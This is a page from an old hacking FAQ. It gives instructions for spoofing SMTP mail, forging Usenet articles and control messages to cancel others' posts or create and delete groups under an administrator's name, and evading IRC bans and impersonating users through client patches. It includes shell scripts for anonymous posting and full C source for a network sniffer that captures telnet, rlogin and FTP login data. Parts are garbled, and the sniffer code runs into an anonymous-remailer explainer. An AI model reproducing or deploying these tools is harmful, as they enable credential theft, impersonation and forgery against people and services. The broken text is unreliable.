| #hack FAQ Home | Computers | Data Networks | Wireless Networks | Telephony | Mobile Telephony |
| Radio | Television | Resources | 2600 | Smart Cards and Magnetic Cards | Miscellaneous |
Telnet to port 25 of the machine you want the mail to appear to originate from. This will connect you directly to the SMTP (Simple Mail Transfer Protocol) daemon running on that host. Then, enter SMTP commands by hand directly to the SMTP daemon.
Enter your message as in this example:
.Please discontinue your silly Clipper initiative.
On systems that have RFC 931 implemented, spoofing your "MAIL FROM:" line will not work. Test by sending yourself fakemail first.
Newer SMTP daemons, such as smail 3.1.29.1+ or sendmail 8.7+, perform an identd check when you connect to them. These SMTP daemons are impossible to completely spoof without first spoofing identd.
For more information read RFC 822 (Standard for the format of ARPA Internet text messages).
Note that the headers inside the DATA statement should be optional, but are actually required by some mailers. Even when not required, they often help your message appear genuine.
To locate an SMTP server for a domain, use `nslookup` and set your querytype to MX.
From: Anonymous (Pretending to be: tale@uunet.uu.net (David C Lawrence))
Subject: FAQ: Better living through forgery
Date: 19 Mar 1995 02:37:09 GMT
Anonymous netnews without "anonymous" remailers
Inspired by the recent "NetNews Judges-L" events, this file has been updated to cover forging control messages, so you can do your own article canceling and create and destroy your own newsgroups.
Save any news article to a file. We'll call it "hak" in this example.
Edit "hak", and remove any header lines of the form
From some!random!path!user (note: "From ", not "From: "!!!)Shorten the Path header down to its LAST two or three "bangized" components. This is to make the article look like it was posted from where it really was posted, and originally hit the net at or near the host you send it to. Or you can construct a completely new Path: line to reflect your assumed alias. Make some change to the Message ID: field, that isn't likely to be duplicated anywhere. This is usually best done by adding a couple of random characters to the part before the @, since news posting programs generally use a fixed-length field to generate these IDs.
Article:
Lines:
Xref:
Change the other headers to say what you like -- From:, Newsgroups:,
Sender:, etc. Replace the original message text with your message. If
you are posting to a moderated group or posting a control message,
remember to put in an Approved: header to bypass the moderation
mechanism.
To specifically cancel someone else's article, you need its message-ID. Your message headers, in addition to what's already there, should also contain the following with that message-ID in it. This makes it a "control message". NOTE: control messages generally require an
Approved: header as well, so you should add one.
Subject: cmsg cancel <xb8700A@twits.site.com>
Control: cancel <xb8700A@twits.site.com>
Approved: luser@twits.site.com
Newsgroups are created and destroyed with control messages, too. If you wanted to create, for instance, comp.misc.microsoft.sucks, your control headers would look like
Subject: cmsg newgroup comp.misc.microsoft.sucks
Control: newgroup comp.misc.microsoft.sucks
Add on the string "moderated" at the end of these if you want the group to be "moderated with no moderator" as with alt.hackers. Somewhere in the body of your message, you should include the following text, changed with the description of the group you're creating:
For your newsgroups file:
comp.misc.microsoft.sucks
We don't do windows
To remove a group, substitute "rmgroup" for "newgroup" in the header lines above. Keep in mind that most sites run all "rmgroup" requests through a human news-master, who may or may not decide to honor it. Group creation is more likely to be automatic than deletion at most installations. Any newsgroup changes are more likely to take effect if the come from me, since my name is hardwired into many of the NNTP control scripts, so using the From: and Approved: headers from this posting is recommended.
Save your changed article, check it to make sure it contains NO reference to yourself or your own site, and send it to your favorite NNTP server that permits transfers via the IHAVE command, using the following script:
#! /bin/sh
## Post an article via IHAVE.
## args: filename server
if test "$2" = "" ; then
echo usage: $0 filename server
exit 1
fi
if test ! -f $1 ; then
echo $1: not found
exit 1
fi
# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
sed 's/.*-[Ii][Dd]: //'`
echo $msgid
( sleep 5
echo IHAVE $msgid
sleep 5
cat $1
sleep 1
echo "."
sleep 1
echo QUIT ) | telnet $2 119
If your article doesn't appear in a day or two, try a different server. They are easy to find. Here's a script that will break a large file full of saved netnews into a list of hosts to try. Edit the output of this if you want, to remove obvious peoples' names and other trash.
#! /bin/sh FGV='fgrep -i -v' egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\ /g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
Once you have your host list, feed it to the following script.
#! /bin/sh while read xx ; do if test "$xx" = "" ; then continue; fi echo === $xx ( echo open $xx 119 sleep 5 echo ihave IamSOk00l@podunk.edu sleep 4 echo . echo quit sleep 1 echo quit ) | telnet doneIf the above script is called "findem" and you're using csh, you should do:
findem < list >& outfile
so that ALL output from telnet is captured. This takes a long time, but when it finishes, edit "outfile" and look for occurrences of "335". These mark answers from servers that might be willing to accept an article. This isn't a completely reliable indication, since some servers respond with acceptance and later drop articles. Try a given server with a slightly modified repeat of someone else's message, and see if it eventually appears.
Sometimes the telnets get into an odd state, and freeze, particularly when a host is refusing NNTP connections. If you manually kill these hung telnet processes but not the main script, the script will continue on. In other words, you may have to monitor the finding script a little while it is running.
You will notice other servers that don't necessarily take an IHAVE, but say "posting ok". You can probably do regular POSTS through these, but they will add an "NNTP-Posting-Host: " header containing the machine YOU came from and are therefore unsuitable for completely anonymous use.
Find a server that is split from the rest of IRC and create your own channel there using the name of the channel you want ChanOp on. When that server reconnects to the net, you will have ChanOp on the real channel. If you have ServerOp on a server, you can cause it to split on purpose.
Applying these changes to the source code for your ircII client and recompiling gives you a new ircII command: /NEWUSER. This new command can be used as follows:
The effect is basically changing your username/IRCname on the fly. Although you are disconnected from your server and reconnected, the ircII client is never exited, thus keeping all your state information and aliases intact. This is ideal for bots that wish to be really obnoxious in ban evasion. ;)
As this is now a new command in ircII, it can be used in scripts. Be aware that the reconnect associated with the NEWUSER command takes time, so TIMER any commands that must immediately follow the NEWUSER. For example... ban evasion made easy (but beware infinite reconnects when your site is banned):
on ^474 * {
echo *** Banned from channel $1
if ($N == [AnnMurray]) {
nick $randomstring
join $1
} {
nick AnnMurray
newuser $randomstring
timer 5 join $1
}
}
Or just to be annoying... a /BE <nickname> alias that will assume a person's username and IRCNAME:
alias be {
^on ^311 * {
^on 311 -*
newuser $2 $5-
}
whois $0
}
Now... in order to add this command to your ircII client, get the latest client source (or whatever client source you are using). Cd into the source directory and edit the file "edit.c". Make the following changes:
Locate the line which reads:
extern void server();
static void newuser();
This pre-defines a new function "newuser()" that we'll add later.
"NAMES", "NAMES", funny_stuff, 0,Insert the following line after it:
"NEWUSER", NULL, newuser, 0,
This adds a new command NEWUSER to the list of valid IRCII commands, and tells it to call our new function newuser() to perform it.
Finally, go the bottom of the file and add the following code as our new function "newuser()":
/* * newuser: the /NEWUSER command. Added by Hendrix * Parameters as follows: * /NEWUSER[new_IRCNAME] * is a new username to use and is required * [new_IRCNAME] is a new IRCNAME string to use and is optional * This will disconnect you from your server and reconnect using * the new information given. You will rejoin all channels you * are currently on and keep your current nickname. */ static void newuser(command, args) char *command, *args; { char *newuname; if (newuname = next_arg(args, &args)) { strmcpy(username, newuname, NAME_LEN); if (*args) strmcpy(realname, args, REALNAME_LEN); say("Reconnecting to server..."); close_server(from_server); if (connect_to_server(server_list[from_server].name, server_list[from_server].port, primary_server) != -1) { change_server_channels(primary_server, from_server); set_window_server(-1, from_server, 1); } else say("Unable to reconnect. Use /SERVER to connect."); } else say("You must specify a username and, optionally, an IRCNAME"); }
/NEWUSER will not hide you from a CTCP query. To do that, modify ctcp.c as shown in the following diff and set an environment variable named CTCPFINGER with the information you would like to display when queried.
*** ctcp.old
--- ctcp.c
***************
*** 334 ****
! char c;
--- 334 ---
! char c, *fing;
***************
*** 350,354 ****
! if (pwd = getpwuid(uid))
{
char *tmp;
--- 350,356 ----
! if (fing = getenv("CTCPFINGER"))
! send_ctcp_reply(from, ctcp->name, fing, diff, c);
! else if (pwd = getpwuid(uid))
{
char *tmp;
Sniffing is listening (with software) to the raw network device for packets that interest you. When your software sees a packet that fits certain criteria, it logs it to a file. The most common criteria for an interesting packet is one that contains words like "login" or "password."
You will have to obtain or code a sniffer that is capable of working with the appropriate type of network interface. Popular network interfaces include NIT (Network Interface Tap), and DLPI (Data Link Provider Interface), and BPF (Berkeley Packet Filter.)
LLI was a network interface used by SCO, which has been augmented with DLPI support as of SCO OpenServer Release V. NIT was a network interface used by Sun, but has been replaced in later releases of SunOS/Solaris with DLPI. Ultrix supported the Ultrix Packet Filter before Digital implemented support for BPF.
DLPI is supported under current releases of System V Release 4, SunOS/Solaris, AIX, HP/UX, UnixWare, Irix, and MacOS. DLPI is partially supported under Digital Unix. Sun DLPI version 2 supports Ethernet, X.25 LAPB, SDLC, ISDN LAPD, CSMA/CD, FDDI, token ring, token bus, and Bisync as data-link protocols. The DLPI network interface provided with HP/UX supports Ethernet/IEEE 802.3, IEEE 802.5, FDDI, and Fibre Channel.
For more information regarding DLPI refer to the DLPI Specification or the paper "How to Use DLPI in Solaris 2.x" by Neal Nuckolls.
BPF is supported under current releases of BSD and Digital Unix, and has been ported to SunOS and Solaris. AIX supports BPF reads, but not writes. A BPF library is available for Linux.
Many sniffers are available for various operating systems:
Here is source code for a sample ethernet sniffer using NIT under SunOS 4.x:
/* Esniff.c */
#include <stdio.h>
#include <ctype.h>
#include <string.h>
#include <sys/time.h>
#include <sys/file.h>
#include <sys/stropts.h>
#include <sys/signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <net/nit_if.h>
#include <net/nit_buf.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/ip_var.h>
#include <netinet/udp_var.h>
#include <netinet/in_systm.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <arpa/inet.h>
#define ERR stderr
char *malloc();
char *device,
*ProgName,
*LogName;
FILE *LOG;
int debug=0;
#define NIT_DEV "/dev/nit"
#define CHUNKSIZE 4096 /* device buffer size */
int if_fd = -1;
int Packet[CHUNKSIZE+32];
void Pexit(err,msg)
int err; char *msg;
{ perror(msg);
exit(err); }
void Zexit(err,msg)
int err; char *msg;
{ fprintf(ERR,msg);
exit(err); }
#define IP ((struct ip *)Packet)
#define IP_OFFSET (0x1FFF)
#define SZETH (sizeof(struct ether_header))
#define IPLEN (ntohs(ip->ip_len))
#define IPHLEN (ip->ip_hl)
#define TCPOFF (tcph->th_off)
#define IPS (ip->ip_src)
#define IPD (ip->ip_dst)
#define TCPS (tcph->th_sport)
#define TCPD (tcph->th_dport)
#define IPeq(s,t) ((s).s_addr == (t).s_addr)
#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
#define MAXBUFLEN (128)
time_t LastTIME = 0;
struct CREC {
struct CREC *Next,
*Last;
time_t Time; /* start time */
struct in_addr SRCip,
DSTip;
u_int SRCport, /* src/dst ports */
DSTport;
u_char Data[MAXBUFLEN+2]; /* important stuff :-) */
u_int Length; /* current data length */
u_int PKcnt; /* # pkts */
u_long LASTseq;
};
struct CREC *CLroot = NULL;
char *Symaddr(ip)
register struct in_addr ip;
{ register struct hostent *he =
gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
return( (he)?(he->h_name):(inet_ntoa(ip)) );
}
char *TCPflags(flgs)
register u_char flgs;
{ static char iobuf[8];
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
SFL(0,TH_FIN, 'F');
SFL(1,TH_SYN, 'S');
SFL(2,TH_RST, 'R');
SFL(3,TH_PUSH,'P');
SFL(4,TH_ACK, 'A');
SFL(5,TH_URG, 'U');
iobuf[6]=0;
return(iobuf);
}
char *SERVp(port)
register u_int port;
{ static char buf[10];
register char *p;
switch(port) {
case IPPORT_LOGINSERVER: p="rlogin"; break;
case IPPORT_TELNET: p="telnet"; break;
case IPPORT_SMTP: p="smtp"; break;
case IPPORT_FTP: p="ftp"; break;
default: sprintf(buf,"%u",port); p=buf; break;
}
return(p);
}
char *Ptm(t)
register time_t *t;
{ register char *p = ctime(t);
p[strlen(p)-6]=0; /* strip " YYYY\n" */
return(p);
}
char *NOWtm()
{ time_t tm;
time(&tm);
return( Ptm(&tm) );
}
#define MAX(a,b) (((a)>(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))
/* add an item */
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
register struct CREC *CLtmp = \
(struct CREC *)malloc(sizeof(struct CREC)); \
time( &(CLtmp->Time) ); \
CLtmp->SRCip.s_addr = SIP.s_addr; \
CLtmp->DSTip.s_addr = DIP.s_addr; \
CLtmp->SRCport = SPORT; \
CLtmp->DSTport = DPORT; \
CLtmp->Length = MIN(LEN,MAXBUFLEN); \
bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
CLtmp->PKcnt = 1; \
CLtmp->Next = CLroot; \
CLtmp->Last = NULL; \
CLroot = CLtmp; \
}
register struct CREC *GET_NODE(Sip,SP,Dip,DP)
register struct in_addr Sip,Dip;
register u_int SP,DP;
{ register struct CREC *CLr = CLroot;
while(CLr != NULL) {
if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
break;
CLr = CLr->Next;
}
return(CLr);
}
#define ADDDATA_NODE(CL,DATA,LEN) { \
bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
CL->Length += LEN; \
}
#define PR_DATA(dp,ln) { \
register u_char lastc=0; \
while(ln-- >0) { \
if(*dp < 32) { \
switch(*dp) { \
case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
break; \
case '\r': \
case '\n': fprintf(LOG,"\n : "); \
break; \
default : fprintf(LOG,"^%c", (*dp + 64)); \
break; \
} \
} else { \
if(isprint(*dp)) fputc(*dp,LOG); \
else fprintf(LOG,"(%d)",*dp); \
} \
lastc = *dp++; \
} \
fflush(LOG); \
}
void END_NODE(CLe,d,dl,msg)
register struct CREC *CLe;
register u_char *d;
register int dl;
register char *msg;
{
fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
fprintf(LOG," DATA: ");
{ register u_int i = CLe->Length;
register u_char *p = CLe->Data;
PR_DATA(p,i);
PR_DATA(d,dl);
}
fprintf(LOG,"\n-- \n");
fflush(LOG);
if(CLe->Next != NULL)
CLe->Next->Last = CLe->Last;
if(CLe->Last != NULL)
CLe->Last->Next = CLe->Next;
else
CLroot = CLe->Next;
free(CLe);
}
/* 30 mins (x 60 seconds) */
#define IDLE_TIMEOUT 1800
#define IDLE_NODE() { \
time_t tm; \
time(&tm); \
if(LastTIME<tm) { \
register struct CREC *CLe,*CLt = CLroot; \
LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
while(CLe=CLt) { \
CLt=CLe->Next; \
if(CLe->Time <tm) \
END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
} \
} \
}
void filter(cp, pktlen)
register char *cp;
register u_int pktlen;
{
register struct ip *ip;
register struct tcphdr *tcph;
{ register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
if(EtherType < 0x600) {
EtherType = *(u_short *)(cp + SZETH + 6);
cp+=8; pktlen-=8;
}
if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
return;
}
/* ugh, gotta do an alignment :-( */
bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
ip = (struct ip *)Packet;
if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
return;
tcph = (struct tcphdr *)(Packet + IPHLEN);
if(!( (TCPD == IPPORT_TELNET) ||
(TCPD == IPPORT_LOGINSERVER) ||
(TCPD == IPPORT_FTP)
)) return;
{ register struct CREC *CLm;
register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
register u_char *p = (u_char *)Packet;
p += ((IPHLEN * 4) + (TCPOFF * 4));
if(debug) {
fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
}
if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
CLm->PKcnt++;
if(length>0)
if( (CLm->Length + length) < MAXBUFLEN ) {
ADDDATA_NODE( CLm, p,length);
} else {
END_NODE( CLm, p,length, "DATA LIMIT");
}
if(TCPFL(TH_FIN|TH_RST)) {
END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
}
} else {
if(TCPFL(TH_SYN)) {
ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
}
}
IDLE_NODE();
}
}
/* signal handler
*/
void death()
{ register struct CREC *CLe;
while(CLe=CLroot)
END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
fflush(LOG);
if(LOG != stdout)
fclose(LOG);
exit(1);
}
/* opens network interface, performs ioctls and reads from it,
* passing data to filter function
*/
void do_it()
{
int cc;
char *buf;
u_short sp_ts_len;
if(!(buf=malloc(CHUNKSIZE)))
Pexit(1,"Eth: malloc");
/* this /dev/nit initialization code pinched from etherfind */
{
struct strioctl si;
struct ifreq ifr;
struct timeval timeout;
u_int chunksize = CHUNKSIZE;
u_long if_flags = NI_PROMISC;
if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
Pexit(1,"Eth: nit open");
if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
Pexit(1,"Eth: ioctl (I_SRDOPT)");
si.ic_timout = INFTIM;
if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
timeout.tv_sec = 1;
timeout.tv_usec = 0;
si.ic_cmd = NIOCSTIME;
si.ic_len = sizeof(timeout);
si.ic_dp = (char *)&timeout;
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
si.ic_cmd = NIOCSCHUNK;
si.ic_len = sizeof(chunksize);
si.ic_dp = (char *)&chunksize;
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
si.ic_cmd = NIOCBIND;
si.ic_len = sizeof(ifr);
si.ic_dp = (char *)𝔦
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
si.ic_cmd = NIOCSFLAGS;
si.ic_len = sizeof(if_flags);
si.ic_dp = (char *)&if_flags;
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
Pexit(1,"Eth: ioctl (I_FLUSH)");
}
while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
register char *bp = buf,
*bufstop = (buf + cc);
while (bp < bufstop) {
register char *cp = bp;
register struct nit_bufhdr *hdrp;
hdrp = (struct nit_bufhdr *)cp;
cp += sizeof(struct nit_bufhdr);
bp += hdrp->nhb_totlen;
filter(cp, (u_long)hdrp->nhb_msglen);
}
}
Pexit((-1),"Eth: read");
}
/* Authorize your program, generate your own password and uncomment here */
/* #define AUTHPASSWD "EloiZgZejWyms" */
void getauth()
{ char *buf,*getpass(),*crypt();
char pwd[21],prmpt[81];
strcpy(pwd,AUTHPASSWD);
sprintf(prmpt,"(%s)UP? ",ProgName);
buf=getpass(prmpt);
if(strcmp(pwd,crypt(buf,pwd)))
exit(1);
}
*/
void main(argc, argv)
int argc;
char **argv;
{
char cbuf[BUFSIZ];
struct ifconf ifc;
int s,
ac=1,
backg=0;
ProgName=argv[0];
/* getauth(); */
LOG=NULL;
device=NULL;
while((ac<argc) && (argv[ac][0] == '-')) {
register char ch = argv[ac++][1];
switch(toupper(ch)) {
case 'I': device=argv[ac++];
break;
case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
Zexit(1,"Output file cant be opened\n");
break;
case 'B': backg=1;
break;
case 'D': debug=1;
break;
default : fprintf(ERR,
"Usage: %s [-b] [-d] [-i interface] [-f file]\n",
ProgName);
exit(1);
}
}
if(!device) {
if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
Pexit(1,"Eth: socket");
ifc.ifc_len = sizeof(cbuf);
ifc.ifc_buf = cbuf;
if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
Pexit(1,"Eth: ioctl");
close(s);
device = ifc.ifc_req->ifr_name;
}
fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
(debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
if(!LOG)
LOG=stdout;
signal(SIGINT, death);
signal(SIGTERM,death);
signal(SIGKILL,death);
signal(SIGQUIT,death);
if(backg && debug) {
fprintf(ERR,"[Cannot bg with debug on]\n");
backg=0;
}
if(backg) {
register int s;
if((s=fork())>0) {
fprintf(ERR,"[pid %d]\n",s);
exit(0);
} else if(s<0)
Pexit(1,"fork");P>
B-09. What is an anonymous remailer?
This FAQ answer was written by Raph Levien:
An anonymous remailer is a system on the Internet that allows you to
send e-mail or post messages to Usenet anonymously.
There are two sorts of remailers in widespread use. The first is the
anon.penet.fi style, the second is the cypherpunk style. The remailer
at anon.penet.fi is immensely popular, with over 160,000 users over its
lifetime, and probably tens of thousands of messages per day. Its main
advantage is that it's so easy to use. The cypherpunks mailers, which
provide much better security, are becoming more popular, however, as
there is more awareness of them.
The user of the anon.penet.fi system first needs to get an anonymous id.
This is done either by sending mail to somebody who already has one (for
example, by replying to a post on Usenet), or sending mail to
ping@anon.penet.fi. In either case, penet will mail back the new anon
id, which looks like an123456@anon.penet.fi. If an123456 then sends
mail to another user of the system, then this is what happens:
-
The mail is transported to anon.penet.fi, which resides somewhere in
the vicinity of Espoo, Finland.
-
These steps are carried out by software running on anon.penet.fi.
Penet first looks up the email address of the sender in its
database, then replaces it with the numeric code. All other
information about the sender is removed.
-
Then, penet looks up the number of the recipient in the same
database, and replaces it with the actual email address.
-
Finally, it sends the mail to the actual email address of the
recipient.
There are variations on this scheme, such as posting to Usenet (in which
step 3 is eliminated), but that's the basic idea.
Where anon.penet.fi uses a secret database to match anon id's to actual
email addresses, the cypherpunks remailers use cryptography to hide the
actual identities. Let's say I want to send email to a real email
address, or post it to Usenet, but keep my identity completely hidden.
To send it through one remailer, this is what happens.
-
I encrypt the message and the recipient's address, using the public
key of the remailer of my choice.
-
I send the email to the remailer.
-
When the remailer gets the mail, it decrypts it using its private
key, revealing as plaintext the message and the recipient's address.
-
All information about the sender is removed.
-
Finally, it sends it to the recipient's email address.
If one trusts the remailer operator, this is good enough. However, the
whole point of the cypherpunks remailers is that you don't have to
trust any one individual or system. So, people who want real security
use a chain of remailers. If any one remailer on the "chain" is honest,
then the privacy of the message is assured.
To use a chain of remailers, I first have to prepare the message, which
is nestled within multiple layers of encryption, like a Russian
matryoshka doll. Preparing such a message is tedious and error prone,
so many people use an automated tool such as my premail package.
Anyway, after preparing the message, it is sent to the first remailer in
the chain, which corresponds to the outermost layer of encryption. Each
remailer strips off one layer of encryption and sends the message to the
next, until it reaches the final remailer. At this point, only the
innermost layer of encryption remains. This layer is stripped off,
revealing the plaintext messagesources |
2600 |
Smart Cards and Magnetic Cards |
Miscellaneous
| © 1994 - 2003 HackFAQ.org
All Rights Reserved |